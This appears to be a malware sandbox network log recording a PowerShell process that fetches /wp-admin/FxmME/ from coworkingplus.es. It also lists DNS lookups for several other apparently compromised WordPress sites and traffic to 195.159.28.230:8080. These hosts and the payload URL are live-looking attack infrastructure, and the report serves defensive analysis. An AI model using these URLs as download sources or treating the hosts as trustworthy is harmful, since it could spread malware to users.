                                                                    Jan 24, 2021 18:03:31.614546061 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614593983 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614610910 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.614636898 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614675999 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614698887 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.614717007 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614756107 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614779949 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.614794970 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614835978 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614852905 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.614876032 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614914894 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.614937067 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.616286039 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.748231888 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.748287916 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.748332024 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.748354912 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.748370886 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.748418093 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.748437881 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.748460054 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.748498917 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.748516083 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.748548985 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.748591900 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.748600006 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.748631001 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.748671055 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.748684883 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.748713017 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.748752117 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.748764992 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.748791933 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.748831034 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.748845100 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.749157906 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.749496937 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.749541998 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.749582052 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.749604940 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.749629021 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.749671936 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.749689102 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.749711990 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.749751091 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.749778986 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.749792099 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.749831915 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.749845028 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.749870062 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.749908924 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.749927998 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.749962091 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.750005960 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.750017881 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.750047922 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.750089884 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.750114918 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.750130892 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.750169039 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.750184059 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.750207901 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.750247002 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.750262022 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.750297070 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.750354052 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.750366926 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.750405073 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.750447989 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.750456095 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.750488043 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.750524998 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.750540972 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.750566959 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.750583887 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.750606060 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.750653028 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.750658989 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.750695944 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.750735044 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.750757933 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.750772953 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.750812054 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.750829935 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.750853062 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.750891924 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.750911951 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.750962973 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.751281023 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.882129908 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.882194042 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.882225037 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.882256031 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.882297039 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.882335901 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.882374048 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.882421970 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.882467031 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.882504940 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.882544041 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.882582903 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.882586956 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.882616997 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.882622004 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.882623911 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.882644892 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.882666111 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.882734060 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.882816076 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.884023905 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.884082079 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.884119987 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.884156942 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.884161949 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.884205103 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.884227037 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.884254932 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.884299994 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.884318113 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.884341002 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.884383917 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.884407043 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.884428978 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.884468079 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.884500027 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.884509087 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.884547949 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.884579897 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.884597063 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.884640932 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.884660959 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.884679079 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.884717941 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.884742022 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.884757042 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.884793997 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.884819984 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.884831905 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.884871006 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.884895086 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.884917974 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.884962082 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.884984970 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.884999990 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.885040045 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.885061026 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.885080099 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.885117054 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.885144949 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.885157108 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.885198116 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.885238886 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.885246992 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.885292053 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.885313034 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.885329962 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.885369062 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.885394096 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.885446072 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.885464907 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.891057968 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:32.016204119 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.016264915 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.016294003 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.016324997 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.016364098 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.016418934 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.016464949 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.016501904 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.016531944 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:32.016541004 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.016566992 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:32.016572952 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:32.016581059 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.016618013 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.016649008 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:32.016655922 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.016695023 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.016719103 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:32.016742945 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.016787052 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.016791105 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:32.016824007 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.016859055 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:32.016864061 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.016905069 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.016932011 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:32.016942978 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.016982079 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.017009020 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:32.017021894 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.017070055 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.017090082 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:32.017116070 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.017155886 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.017185926 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:32.017195940 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.017235041 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.017263889 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:32.017271996 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.017311096 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.017343998 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:32.017349005 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.017411947 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:32.017436028 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.017489910 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.017533064 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.017559052 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:32.017573118 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.017612934 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.017641068 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:32.017651081 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.017688990 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.017729044 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.017735004 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:32.017766953 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.017796993 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:32.017815113 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.017857075 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.017888069 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:32.017894983 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.017934084 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.017962933 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:32.017972946 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.018009901 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.018042088 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:32.018049955 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.018079996 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:32.018117905 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:32.020024061 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:32.319114923 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:32.319190979 CET4917180192.168.2.2245.143.97.183
                                                                    Jan 24, 2021 18:03:32.319575071 CET4916680192.168.2.22166.62.10.32
                                                                    Jan 24, 2021 18:03:32.319933891 CET4916580192.168.2.22104.21.89.78
                                                                    Jan 24, 2021 18:04:45.713690996 CET4917380192.168.2.2269.38.130.14
                                                                    Jan 24, 2021 18:04:48.726026058 CET4917380192.168.2.2269.38.130.14
                                                                    Jan 24, 2021 18:04:59.680458069 CET491748080192.168.2.22195.159.28.230
                                                                    Jan 24, 2021 18:04:59.720827103 CET808049174195.159.28.230192.168.2.22
                                                                    Jan 24, 2021 18:04:59.720974922 CET491748080192.168.2.22195.159.28.230
                                                                    Jan 24, 2021 18:04:59.722896099 CET491748080192.168.2.22195.159.28.230
                                                                    Jan 24, 2021 18:04:59.723037958 CET491748080192.168.2.22195.159.28.230
                                                                    Jan 24, 2021 18:04:59.763123989 CET808049174195.159.28.230192.168.2.22
                                                                    Jan 24, 2021 18:04:59.763178110 CET808049174195.159.28.230192.168.2.22
                                                                    Jan 24, 2021 18:04:59.763246059 CET491748080192.168.2.22195.159.28.230
                                                                    Jan 24, 2021 18:04:59.763298035 CET491748080192.168.2.22195.159.28.230
                                                                    Jan 24, 2021 18:04:59.803536892 CET808049174195.159.28.230192.168.2.22
                                                                    Jan 24, 2021 18:04:59.803580046 CET808049174195.159.28.230192.168.2.22
                                                                    Jan 24, 2021 18:04:59.803597927 CET808049174195.159.28.230192.168.2.22
                                                                    Jan 24, 2021 18:04:59.803625107 CET808049174195.159.28.230192.168.2.22
                                                                    Jan 24, 2021 18:04:59.975095987 CET808049174195.159.28.230192.168.2.22
                                                                    Jan 24, 2021 18:04:59.975120068 CET808049174195.159.28.230192.168.2.22
                                                                    Jan 24, 2021 18:04:59.975131035 CET808049174195.159.28.230192.168.2.22
                                                                    Jan 24, 2021 18:04:59.975193977 CET491748080192.168.2.22195.159.28.230
                                                                    Jan 24, 2021 18:04:59.975234985 CET491748080192.168.2.22195.159.28.230
                                                                    Jan 24, 2021 18:05:02.977569103 CET808049174195.159.28.230192.168.2.22
                                                                    Jan 24, 2021 18:05:02.977790117 CET491748080192.168.2.22195.159.28.230

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jan 24, 2021 18:03:27.502136946 CET5219753192.168.2.228.8.8.8
                                                                    Jan 24, 2021 18:03:27.539346933 CET53521978.8.8.8192.168.2.22
                                                                    Jan 24, 2021 18:03:27.632148981 CET5309953192.168.2.228.8.8.8
                                                                    Jan 24, 2021 18:03:27.678886890 CET53530998.8.8.8192.168.2.22
                                                                    Jan 24, 2021 18:03:28.180188894 CET5283853192.168.2.228.8.8.8
                                                                    Jan 24, 2021 18:03:28.340291023 CET53528388.8.8.8192.168.2.22
                                                                    Jan 24, 2021 18:03:28.953387022 CET6120053192.168.2.228.8.8.8
                                                                    Jan 24, 2021 18:03:29.245902061 CET53612008.8.8.8192.168.2.22
                                                                    Jan 24, 2021 18:03:29.843183994 CET4954853192.168.2.228.8.8.8
                                                                    Jan 24, 2021 18:03:29.925537109 CET53495488.8.8.8192.168.2.22
                                                                    Jan 24, 2021 18:03:30.647469044 CET5562753192.168.2.228.8.8.8
                                                                    Jan 24, 2021 18:03:30.810009003 CET53556278.8.8.8192.168.2.22

                                                                    ICMP Packets

                                                                    TimestampSource IPDest IPChecksumCodeType
                                                                    Jan 24, 2021 18:04:47.949908018 CET69.38.130.14192.168.2.228718(Host unreachable)Destination Unreachable
                                                                    Jan 24, 2021 18:04:51.799916029 CET69.38.130.14192.168.2.228718(Host unreachable)Destination Unreachable

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                    Jan 24, 2021 18:03:27.502136946 CET192.168.2.228.8.8.80xc52cStandard query (0)coworkingplus.esA (IP address)IN (0x0001)
                                                                    Jan 24, 2021 18:03:27.632148981 CET192.168.2.228.8.8.80x4d68Standard query (0)silkonbusiness.matrixinfotechsolution.comA (IP address)IN (0x0001)
                                                                    Jan 24, 2021 18:03:28.180188894 CET192.168.2.228.8.8.80x3714Standard query (0)bbjugueteria.comA (IP address)IN (0x0001)
                                                                    Jan 24, 2021 18:03:28.953387022 CET192.168.2.228.8.8.80xa6edStandard query (0)www.bimception.comA (IP address)IN (0x0001)
                                                                    Jan 24, 2021 18:03:29.843183994 CET192.168.2.228.8.8.80x758fStandard query (0)armakonarms.comA (IP address)IN (0x0001)
                                                                    Jan 24, 2021 18:03:30.647469044 CET192.168.2.228.8.8.80xf75cStandard query (0)alugrama.com.mxA (IP address)IN (0x0001)

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                    Jan 24, 2021 18:03:27.539346933 CET8.8.8.8192.168.2.220xc52cNo error (0)coworkingplus.es104.21.89.78A (IP address)IN (0x0001)
                                                                    Jan 24, 2021 18:03:27.539346933 CET8.8.8.8192.168.2.220xc52cNo error (0)coworkingplus.es172.67.138.213A (IP address)IN (0x0001)
                                                                    Jan 24, 2021 18:03:27.678886890 CET8.8.8.8192.168.2.220x4d68No error (0)silkonbusiness.matrixinfotechsolution.com166.62.10.32A (IP address)IN (0x0001)
                                                                    Jan 24, 2021 18:03:28.340291023 CET8.8.8.8192.168.2.220x3714No error (0)bbjugueteria.com162.241.60.240A (IP address)IN (0x0001)
                                                                    Jan 24, 2021 18:03:29.245902061 CET8.8.8.8192.168.2.220xa6edNo error (0)www.bimception.combimception.comCNAME (Canonical name)IN (0x0001)
                                                                    Jan 24, 2021 18:03:29.245902061 CET8.8.8.8192.168.2.220xa6edNo error (0)bimception.com162.241.224.176A (IP address)IN (0x0001)
                                                                    Jan 24, 2021 18:03:29.925537109 CET8.8.8.8192.168.2.220x758fNo error (0)armakonarms.com45.143.97.183A (IP address)IN (0x0001)
                                                                    Jan 24, 2021 18:03:30.810009003 CET8.8.8.8192.168.2.220xf75cNo error (0)alugrama.com.mx162.241.61.203A (IP address)IN (0x0001)

                                                                    HTTP Request Dependency Graph

                                                                    • coworkingplus.es
                                                                    • silkonbusiness.matrixinfotechsolution.com
                                                                    • armakonarms.com
                                                                    • alugrama.com.mx
                                                                    • 195.159.28.230
                                                                      • 195.159.28.230:8080

                                                                    HTTP Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    0192.168.2.2249165104.21.89.7880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Jan 24, 2021 18:03:27.576509953 CET0OUTGET /wp-admin/FxmME/ HTTP/1.1
                                                                    Host: coworkingplus.es
                                                                    Connection: Keep-Alive
                                                                    Jan 24, 2021 18:03:27.612721920 CET1INHTTP/1.1 200 OK
                                                                    Date: Sun, 24 Jan 2021 17:03:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Set-Cookie: __cfduid=d12959decfc29f1e011ae337be7f9776f1611507807; expires=Tue, 23-Feb-21 17:03:27 GMT; path=/; domain=.coworkingplus.es; HttpOnly; SameSite=Lax
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    cf-request-id: 07d6f2cd6200000614ba13c000000001
                                                                    Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=jqyW769qYKf6%2Fv%2BYWWWZw7E9by13eUCOBGSNW2OacWMojO0Wx075cXGx2oruRhH%2FKxfRl85tvN%2FuOA7KSRIEssJnBBzm3OERG1r%2B44pKy2zr"}],"max_age":604800}
                                                                    NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                    Server: cloudflare
                                                                    CF-RAY: 616b53f5680a0614-FRA
